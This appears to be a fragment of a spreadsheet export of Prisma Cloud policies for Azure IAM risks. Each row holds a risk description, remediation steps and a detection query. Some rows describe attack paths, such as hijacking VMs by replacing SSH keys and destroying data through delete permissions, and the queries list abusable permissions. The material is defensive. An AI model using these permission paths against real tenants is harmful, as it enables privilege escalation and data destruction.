      <c r="P3077" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3077" t="inlineStr"/>
      <c r="R3077" t="inlineStr"/>
      <c r="S3077" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3077" t="b">
        <v>0</v>
      </c>
      <c r="U3077" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3077" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3077" t="inlineStr">
        <is>
          <t>This policy identifies Azure AD Groups, Service Principals, and Managed Identities with Stale IAM Effective Metadata Write Permissions.
Risk of Unused Metadata Write Permissions:
Azure AD groups, service principals, and managed identities with Unused IAM effective Metadata Write permissions for 90 days pose a security risk because:
Information Gathering Tool: An attacker with access to these identities could leverage them to gather details about your Azure environment. This information could include virtual machine (VM) configurations, resource locations, or network security groups. Attackers could exploit this knowledge to identify vulnerabilities or plan further intrusions.
Potential Privilege Escalation: If compromised, unused identities with Metadata Write permissions could be used by attackers to escalate privileges within your Azure environment. They might exploit these permissions to gain control of VMs or manipulate virtual networks, potentially leading to unauthorized access to more sensitive data or systems.
Mitigating the Risk:
Regular Review and Removal: Proactively identify and remove unused Azure AD groups, service principals, and managed identities with any level of IAM effective Metadata access (Read or Write) on a regular basis.
Principle of Least Privilege: Always adhere to the principle of least privilege when assigning Azure RBAC (Role-Based Access Control) permissions. Grant only the minimum level of Metadata Write access required for an identity to function effectively. Evaluate if alternative methods, like Managed Identity access restrictions, can limit access to specific VMs or resource groups.
Monitor for Unusual Activity: Utilize Azure Monitor to track activity logs, including access attempts for Azure AD identities. This vigilance can help detect unusual activity related to unused identities that might indicate a compromise.</t>
        </is>
      </c>
      <c r="X3077"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77" t="inlineStr"/>
      <c r="Z3077" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' and grantedby.cloud.entity.type NOT IN ('user') and action.access.level = 'Metadata Write' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3077" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3077" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3077" t="inlineStr"/>
      <c r="AD3077" t="b">
        <v>1</v>
      </c>
      <c r="AE3077" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3077" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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7" t="inlineStr">
        <is>
          <t>7195900e-8d97-40a2-9591-bb7901072770</t>
        </is>
      </c>
      <c r="AI3077" t="inlineStr">
        <is>
          <t>7195900e-8d97-40a2-9591-bb7901072770</t>
        </is>
      </c>
      <c r="AJ3077" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3077" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3078">
      <c r="A3078" t="inlineStr"/>
      <c r="B3078" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3078" s="2" t="inlineStr"/>
      <c r="D3078" t="inlineStr"/>
      <c r="E3078" t="inlineStr"/>
      <c r="F3078" t="inlineStr"/>
      <c r="G3078" t="b">
        <v>1</v>
      </c>
      <c r="H30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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3078" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3078" t="inlineStr">
        <is>
          <t>Azure Users and Machine Identities with IAM Data Read permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3078" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3078" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3078" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3078" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3078" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3078" t="inlineStr"/>
      <c r="R3078" t="inlineStr"/>
      <c r="S3078" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3078" t="b">
        <v>1</v>
      </c>
      <c r="U3078" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3078" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3078" t="inlineStr">
        <is>
          <t>This policy identifies Azure AD Identities with Unused Data Read Permissions.
Even seemingly low-risk permissions like "Data Read" in Azure Active Directory (AAD) can be problematic if left unused for 90 days. Here's why:
Information Gathering: An attacker could exploit these credentials to gather sensitive information about your Azure environment. This data could include details about storage accounts, databases, or other resources containing sensitive information. Attackers can use this information to identify vulnerabilities or plan further attacks.
Compromise Stepping Stone: Unused identities with Data Read permissions can be a stepping stone for attackers. They might use them to learn about your environment's layout and identify other resources or users to target for further compromise.
While Data Read itself doesn't allow direct data manipulation, the information gleaned can be valuable for attackers. Here's how to mitigate the risk:
Regular Review and Removal: Identify and disable unused Azure AD identities with any level of Data access (Read or Write) on a regular basis.
Least Privilege: Grant only the minimum permissions required for a user or machine identity to function. Data Read should only be assigned if absolutely necessary.
Monitor forSuspicious Activity: Utilize Azure Monitor to track activity logs, including access attempts for Azure AD identities. This can help detect unusual activity related to unused accounts that might indicate a compromise.</t>
        </is>
      </c>
      <c r="X3078"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07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78" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' and action.access.level = 'Data Read' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3078" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3078" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3078" t="inlineStr"/>
      <c r="AD3078" t="b">
        <v>1</v>
      </c>
      <c r="AE3078" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3078" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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8" t="inlineStr">
        <is>
          <t>ad70a063-6278-48ff-8213-5f7a3d9cb39c</t>
        </is>
      </c>
      <c r="AI3078" t="inlineStr">
        <is>
          <t>ad70a063-6278-48ff-8213-5f7a3d9cb39c</t>
        </is>
      </c>
      <c r="AJ3078" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3078" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3079">
      <c r="A3079" t="inlineStr"/>
      <c r="B3079" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3079" s="2" t="inlineStr"/>
      <c r="D3079" t="inlineStr"/>
      <c r="E3079" t="inlineStr"/>
      <c r="F3079" t="inlineStr"/>
      <c r="G3079" t="b">
        <v>1</v>
      </c>
      <c r="H30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79" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3079" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3079" t="inlineStr">
        <is>
          <t>Azure AD user with the Azure built-in roles of Owner</t>
        </is>
      </c>
      <c r="L3079" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3079" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3079" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3079" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3079" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3079" t="inlineStr"/>
      <c r="R3079" t="inlineStr"/>
      <c r="S3079" t="inlineStr"/>
      <c r="T3079" t="b">
        <v>0</v>
      </c>
      <c r="U3079" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3079" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3079" t="inlineStr">
        <is>
          <t>Using the Azure built-in role of Owner with Azure AD users provides broad permissions sets that can lead to privilege escalation. A few examples are virtual machine lateral movement (like running commands on other VMs), storage account access and configuration access</t>
        </is>
      </c>
      <c r="X3079"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user from the list</t>
        </is>
      </c>
      <c r="Y3079" t="inlineStr"/>
      <c r="Z3079" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' AND source.cloud.resource.type = 'user' AND grantedby.cloud.policy.type = 'Built-in Role' AND grantedby.cloud.policy.name = 'Owner'</t>
        </is>
      </c>
      <c r="AA3079" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3079" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3079" t="inlineStr"/>
      <c r="AD3079" t="b">
        <v>1</v>
      </c>
      <c r="AE3079" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3079" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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79" t="inlineStr">
        <is>
          <t>9370db0b-6b0a-474f-8132-c8cd583a9356</t>
        </is>
      </c>
      <c r="AI3079" t="inlineStr">
        <is>
          <t>9370db0b-6b0a-474f-8132-c8cd583a9356</t>
        </is>
      </c>
      <c r="AJ3079" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3079" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3080">
      <c r="A3080" t="inlineStr"/>
      <c r="B3080" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3080" s="2" t="inlineStr"/>
      <c r="D3080" t="inlineStr"/>
      <c r="E3080" t="inlineStr"/>
      <c r="F3080" t="inlineStr"/>
      <c r="G3080" t="b">
        <v>1</v>
      </c>
      <c r="H30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80" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3080" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3080" t="inlineStr">
        <is>
          <t>System/User-assigned managed identity with critical Entra ID permissions</t>
        </is>
      </c>
      <c r="L3080" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3080" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3080" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3080" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3080" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3080" t="inlineStr"/>
      <c r="R3080" t="inlineStr"/>
      <c r="S3080" t="inlineStr"/>
      <c r="T3080" t="b">
        <v>1</v>
      </c>
      <c r="U3080" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3080" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3080" t="inlineStr">
        <is>
          <t>This policy detects Azure system-assigned and user-assigned managed identities that are granted critical Graph API permissions or assigned roles containing high-privilege Entra ID permissions. These permissions, such as the ability to create or modify critical resources, may lead to potential privilege escalation or data exfiltration risks.</t>
        </is>
      </c>
      <c r="X3080" t="inlineStr">
        <is>
          <t>How to remediate?
Click on the Source.
On the right, click on View JSON.
From the JSON, extract the "id" property under the "data" property.
Log in to the Azure Portal.
Navigate to Enterprise Applications, and find the matching Enterprise Application by pasting the "id" from the previous step.
Click on the Enterprise Application.
For Entra ID permissions:
Go to Manage.
Go to Roles and administrators.
Revoke the relevant role that grants the "microsoft.directory/applications/credentials/update" or "microsoft.directory/applications/owners/update" action.
For Graph API permissions:
Go to Security.
Go to Permissions.
On this page, you will see the violating permission matching the "action" column from the investigation.
Click on the three dots (...) then select "Revoke Permission".</t>
        </is>
      </c>
      <c r="Y308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80" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AZURE' AND source.cloud.resource.type IN ('System Assigned','User Assigned' ) and action.name in ('Application.ReadWrite.All','Directory.ReadWrite.All','microsoft.directory/applications/owners/update','microsoft.directory/applications/credentials/update','RoleManagement.ReadWrite.Directory','microsoft.directory/groups.security/owners/update','microsoft.directory/groups.security.assignedMembership/members/update','microsoft.directory/groups.security/members/update','microsoft.directory/groups.unified/owners/update','microsoft.directory/groups.unified.assignedMembership/members/update','microsoft.directory/groups.unified/members/update','microsoft.directory/groupsAssignableToRoles/allProperties/update','User.ReadWrite.All','microsoft.directory/users/password/update','AppRoleAssignment.ReadWrite.All','microsoft.directory/servicePrincipals/appRoleAssignedTo/update','microsoft.directory/groups/members/update','microsoft.directory/groups/owners/update','Mail.ReadWrite','Files.ReadWrite.All','Sites.ReadWrite.All','Sites.FullControl.All')</t>
        </is>
      </c>
      <c r="AA3080" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3080" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:36</t>
        </is>
      </c>
      <c r="AC3080" t="inlineStr"/>
      <c r="AD3080" t="b">
        <v>1</v>
      </c>
      <c r="AE3080" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3080" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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80" t="inlineStr">
        <is>
          <t>2b4d84a2-ba18-4d89-843e-9c3a4ab5006b</t>
        </is>
      </c>
      <c r="AI3080" t="inlineStr">
        <is>
          <t>2b4d84a2-ba18-4d89-843e-9c3a4ab5006b</t>
        </is>
      </c>
      <c r="AJ3080" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3080" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3081">
      <c r="A3081" t="inlineStr"/>
      <c r="B3081" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3081" s="2" t="inlineStr"/>
      <c r="D3081" t="inlineStr"/>
      <c r="E3081" t="inlineStr"/>
      <c r="F3081" t="inlineStr"/>
      <c r="G3081" t="b">
        <v>1</v>
      </c>
      <c r="H30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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3081" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3081" t="inlineStr">
        <is>
          <t>Azure Managed Identity (user assigned or system assigned) with the Azure built-in roles of Owner</t>
        </is>
      </c>
      <c r="L3081" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3081" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3081" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3081" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3081" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3081" t="inlineStr"/>
      <c r="R3081" t="inlineStr"/>
      <c r="S3081" t="inlineStr"/>
      <c r="T3081" t="b">
        <v>0</v>
      </c>
      <c r="U3081" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3081" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3081" t="inlineStr">
        <is>
          <t>Managed identities provide an automatic way for applications to connect to resources that support Azure Active Directory (Azure AD) authentication. Using the Azure built-in role of Owner with managed identities provides broad permissions sets for a non-human identity that can lead to privilege escalation. A few examples are virtual machine lateral movement (like running commands on other VMs), storage account access and configuration access</t>
        </is>
      </c>
      <c r="X3081"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'Owner' definition role that you want to examine and select the Assignments tab to view all the assignments associated with the selected role
7. Remove user assigned or system assigned managed identity from the list</t>
        </is>
      </c>
      <c r="Y3081" t="inlineStr"/>
      <c r="Z3081" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' AND grantedby.cloud.entity.type IN ( 'System Assigned', 'User Assigned' ) AND grantedby.cloud.policy.type = 'Built-in Role' AND grantedby.cloud.policy.name = 'Owner'</t>
        </is>
      </c>
      <c r="AA3081" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3081" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3081" t="inlineStr"/>
      <c r="AD3081" t="b">
        <v>1</v>
      </c>
      <c r="AE3081" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3081" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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1" t="inlineStr">
        <is>
          <t>7b0539b4-5fe4-4322-aff0-1535b24722db</t>
        </is>
      </c>
      <c r="AI3081" t="inlineStr">
        <is>
          <t>7b0539b4-5fe4-4322-aff0-1535b24722db</t>
        </is>
      </c>
      <c r="AJ3081" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3081" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3082">
      <c r="A3082" t="inlineStr"/>
      <c r="B3082" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3082" s="2" t="inlineStr"/>
      <c r="D3082" t="n">
        <v>0</v>
      </c>
      <c r="E3082" t="n">
        <v>2</v>
      </c>
      <c r="F3082" t="n">
        <v>0</v>
      </c>
      <c r="G3082" t="b">
        <v>1</v>
      </c>
      <c r="H30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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3082" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3082" t="inlineStr">
        <is>
          <t>Azure Lateral Movement Through SSH Key Replacement and Managed Identity Exploitation on VM</t>
        </is>
      </c>
      <c r="L3082" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING</t>
        </is>
      </c>
      <c r="M3082" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3082" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3082" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3082" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3082" t="inlineStr"/>
      <c r="R3082" t="inlineStr"/>
      <c r="S3082" t="inlineStr"/>
      <c r="T3082" t="b">
        <v>1</v>
      </c>
      <c r="U3082" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3082" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3082" t="inlineStr">
        <is>
          <t>Using this role allows creating and changing virtual machines in the subscription, with ''Microsoft.ClassicCompute/virtualMachines/write'' and ''Microsoft.ClassicCompute/virtualMachines/extensions/write'' an adversary can update SSH keys for a given VM in the subscription and hijack the resource'. In this way, they can connect any VM in the subscription, use the assigned managed-identity connected to them and move laterally between Vnets, environments and resources from the accessed VM.</t>
        </is>
      </c>
      <c r="X3082"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identity and the role with permissions to Microsoft.ClassicCompute
 6. Remove the assignment or change the permissions of the role
 7. Create a new assignment with built-in or custom role without risky permissions and/or scoped down to only VMs that this identity requires access to, if necessary</t>
        </is>
      </c>
      <c r="Y308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82" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AZURE' AND action.name CONTAINS ALL ('Microsoft.ClassicCompute/virtualMachines/write', 'Microsoft.ClassicCompute/virtualMachines/extensions/write') AND grantedby.cloud.entity.type IN ( 'user assigned', 'system assigned', 'service principal', 'user') AND grantedby.level.type = 'Azure Subscription'</t>
        </is>
      </c>
      <c r="AA3082" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3082" t="inlineStr">
        <is>
          <t>2024-10-30 17:00:50</t>
        </is>
      </c>
      <c r="AC3082" t="inlineStr"/>
      <c r="AD3082" t="b">
        <v>1</v>
      </c>
      <c r="AE3082" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3082" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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2" t="inlineStr">
        <is>
          <t>edf08e81-3014-4750-9b88-0a194dfe8a4e</t>
        </is>
      </c>
      <c r="AI3082" t="inlineStr">
        <is>
          <t>edf08e81-3014-4750-9b88-0a194dfe8a4e</t>
        </is>
      </c>
      <c r="AJ3082" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3082" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3083">
      <c r="A3083" t="inlineStr"/>
      <c r="B3083" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3083" s="2" t="inlineStr"/>
      <c r="D3083" t="inlineStr"/>
      <c r="E3083" t="inlineStr"/>
      <c r="F3083" t="inlineStr"/>
      <c r="G3083" t="b">
        <v>1</v>
      </c>
      <c r="H30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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3083" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3083" t="inlineStr">
        <is>
          <t>Azure VM instance with data destruction permissions</t>
        </is>
      </c>
      <c r="L3083" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3083" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3083" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3083" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3083" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3083" t="inlineStr"/>
      <c r="R3083" t="inlineStr"/>
      <c r="S3083" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3083" t="b">
        <v>1</v>
      </c>
      <c r="U3083" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3083" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3083" t="inlineStr">
        <is>
          <t>With access to  'Microsoft.Compute/disks/delete', 'Microsoft.Compute/virtualMachines/delete', 'Microsoft.Compute/images/delete', 'Microsoft.DBforMySQL/servers/delete', 'Microsoft.Sql/servers/delete', 'Microsoft.Storage/storageAccounts/delete' permissions an adversary can destroy sensitive information stored in your cloud resources, making irreversible damage to your organization</t>
        </is>
      </c>
      <c r="X3083" t="inlineStr">
        <is>
          <t>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308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83" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AZURE' AND source.cloud.type = 'AZURE' AND source.cloud.service.name = 'Microsoft.Compute' AND source.cloud.resource.type = 'VirtualMachines' and action.name IN ( 'Microsoft.Compute/disks/delete', 'Microsoft.Compute/virtualMachines/delete', 'Microsoft.Compute/images/delete', 'Microsoft.DBforMySQL/servers/delete', 'Microsoft.Sql/servers/delete', 'Microsoft.Storage/storageAccounts/delete' )</t>
        </is>
      </c>
      <c r="AA3083" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3083" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3083" t="inlineStr"/>
      <c r="AD3083" t="b">
        <v>1</v>
      </c>
      <c r="AE3083" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3083" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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3" t="inlineStr">
        <is>
          <t>9c8f3ac1-e5d7-4457-bde9-463821881cc2</t>
        </is>
      </c>
      <c r="AI3083" t="inlineStr">
        <is>
          <t>9c8f3ac1-e5d7-4457-bde9-463821881cc2</t>
        </is>
      </c>
      <c r="AJ3083" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3083" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3084">
      <c r="A3084" t="inlineStr"/>
      <c r="B3084" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3084" s="2" t="inlineStr"/>
      <c r="D3084" t="inlineStr"/>
      <c r="E3084" t="inlineStr"/>
      <c r="F3084" t="inlineStr"/>
      <c r="G3084" t="b">
        <v>1</v>
      </c>
      <c r="H30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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3084" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3084" t="inlineStr">
        <is>
          <t>Azure AD users with broad Key Vault access through Built-in Azure roles</t>
        </is>
      </c>
      <c r="L3084" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3084" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3084" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3084" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3084" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3084" t="inlineStr"/>
      <c r="R3084" t="inlineStr"/>
      <c r="S3084" t="inlineStr"/>
      <c r="T3084" t="b">
        <v>0</v>
      </c>
      <c r="U3084" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3084" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3084" t="inlineStr">
        <is>
          <t>Providing Key Vault access lets users manage key vaults. The least privilege model should be enforced and unused sensitive permissions should be revoked</t>
        </is>
      </c>
      <c r="X3084"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user and the role with permissions to Microsoft KeyVault
    6. Remove the assignment
    7. Create a new assignment with built-in or custom role without risky permissions and/or scoped down to only the Key Vaults that this identity requires access to, if necessary</t>
        </is>
      </c>
      <c r="Y3084" t="inlineStr"/>
      <c r="Z3084" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' AND source.cloud.resource.type = 'user' AND grantedby.cloud.policy.type = 'Built-in Role' AND grantedby.cloud.policy.name IN( 'Key Vault Administrator','Key Vault Certificates Officer','Key Vault Crypto Officer','Key Vault Crypto Service Encryption User','Key Vault Crypto User','Key Vault Reader','Key Vault Secrets Officer','Key Vault Secrets User' )AND dest.cloud.service.name = 'Microsoft.KeyVault' AND dest.cloud.resource.name = '*'</t>
        </is>
      </c>
      <c r="AA3084" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3084" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3084" t="inlineStr"/>
      <c r="AD3084" t="b">
        <v>1</v>
      </c>
      <c r="AE3084" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3084" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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4" t="inlineStr">
        <is>
          <t>49326617-2029-40c5-ac5f-e6ae939b2bdf</t>
        </is>
      </c>
      <c r="AI3084" t="inlineStr">
        <is>
          <t>49326617-2029-40c5-ac5f-e6ae939b2bdf</t>
        </is>
      </c>
      <c r="AJ3084" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3084" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3085">
      <c r="A3085" t="inlineStr"/>
      <c r="B3085" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3085" s="2" t="inlineStr"/>
      <c r="D3085" t="n">
        <v>0</v>
      </c>
      <c r="E3085" t="n">
        <v>55</v>
      </c>
      <c r="F3085" t="n">
        <v>0</v>
      </c>
      <c r="G3085" t="b">
        <v>1</v>
      </c>
      <c r="H30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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3085" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3085" t="inlineStr">
        <is>
          <t>Azure effective permissions granting wildcard resource access</t>
        </is>
      </c>
      <c r="L3085" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3085" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3085" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3085" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3085" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3085" t="inlineStr"/>
      <c r="R3085" t="inlineStr"/>
      <c r="S3085" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3085" t="b">
        <v>0</v>
      </c>
      <c r="U3085" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3085" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3085" t="inlineStr">
        <is>
          <t>This policy identifies Azure IAM role definitions that contain '*' at the scope level. Ensure that the Azure role definitions don’t have '*' at the scope level.</t>
        </is>
      </c>
